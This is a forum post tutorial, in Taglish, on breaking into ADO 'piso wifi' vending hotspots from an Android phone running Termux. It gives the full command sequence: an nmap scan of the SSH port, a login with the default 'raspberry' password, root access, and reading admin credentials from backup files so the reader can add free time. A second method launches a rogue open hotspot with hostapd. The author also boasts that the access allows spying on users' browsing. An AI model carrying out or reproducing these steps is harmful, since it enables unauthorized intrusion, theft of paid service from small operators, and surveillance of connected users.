👨‍🏫 Tutorial Häçk ADO piso wifi systems using android (termux) via ssh.

N

NzD4rkS3c

ezgif-3-ff9a1c9d0a.png



häçk ado pisowifi version 3.x.x by connecting via ssh using android.

1.
Download termux from: You do not have permission to view the full content of this post. Log in or register now.
2
. Install termux.
3. Open termux (make sure you have internet connection)
4. update packages:
pkg update -y && pkg upgrade -y
5. install ssh client:
pkg install openssh nmap -y
6. check if open ba yung ssh port:
nmap -p 22 10.0.0.1 -T4
May pag nakikita kayo na something na ganto:
PORT STATE SERVICE
22/tcp open ssh
means open ung port ng ssh which is ung kokonnekan natin para maccess yung system ng ado..
(naka open din to sa pisofi, diko lang alam password, but soon..), pag yung STATE is closed then.. naka close yung ssh, di ka makakaconnect.

7. connect to ssh server
type password raspberry as password.

Then ngayon nasa loob kana ng system ng ado.. sa mismong loob ng system. dito kung marunong ka maglinux pede mu gawin lahat, like spy sa mga nakaconnect tignan yung mga sites na pinuntahan nila.. ibahin yung page ng pisowifi gawing kung ano ano.. pero for this tut ang ituturo ko lang is kung pano magkainternet

NOTE: Dito sa baba lahat ng process dito is sa loob na ng ado pisowifi system, kapag naka connect na kayo sa SSH server. Hindi required na magroot ng cp.

GAINING INTERNET ACCESS METHODS:

METHOD #1: häçkING THE ADMIN PANEL
Since wala namang password ung root ng ado.. so switch to root instead normal user shell.

ON ADO SYSTEM: (pi@10 ~$) ganyan makikita nyo.. pagkatapos komonect sa ssh..

1. first have a root access:
yung pi@10 ~:$ magiging root@10 ~:# para di na need ng sudo kada execute ng command.

2. install packages that you will use later:
apt install unzip wget nmap -y
3. go to piso wifi backup:
cd /opt/piso-wifi/backup
4. extract backup files using unzip:
# unzip <backup filename>
5. then go to backup folder:
cd <backup folder name>
6. read the files (usernames for admin panel) backup:
cat <filename>
and you will see the username and password for admin.
7. goto You do not have permission to view the full content of this post. Log in or register now. and use the username and password to add time.


METHOD #2: CREATING A OPEN HOTSPOT THAT WILL PROVIDE INTERNET FOR ALL.
1. first have a root access:
2. goto etc directory:
cd /etc/hostapd/
3. create a config file:
printf 'interface=wlan0\nssid=Free WiFi\nhw_mode=g\nchannel=7' >> hostapd-freewifi.conf
4. start the hostpot:
hostapd hostapd-freewifi.conf
5. connect to Free WiFi.

NOTE: if the piso wifi is restarted the hotspot will disappear.

Edited


häçkED BY AndroS3c PH
 

About this Thread

  • 91
    Replies
  • 21K
    Views
  • 73
    Participants
Last reply from:
juzjus10

Online now

Members online
1,031
Guests online
1,408
Total visitors
2,439

Forum statistics

Threads
2,273,341
Posts
28,948,891
Members
1,235,707
Latest member
trisyanperez
Back
Top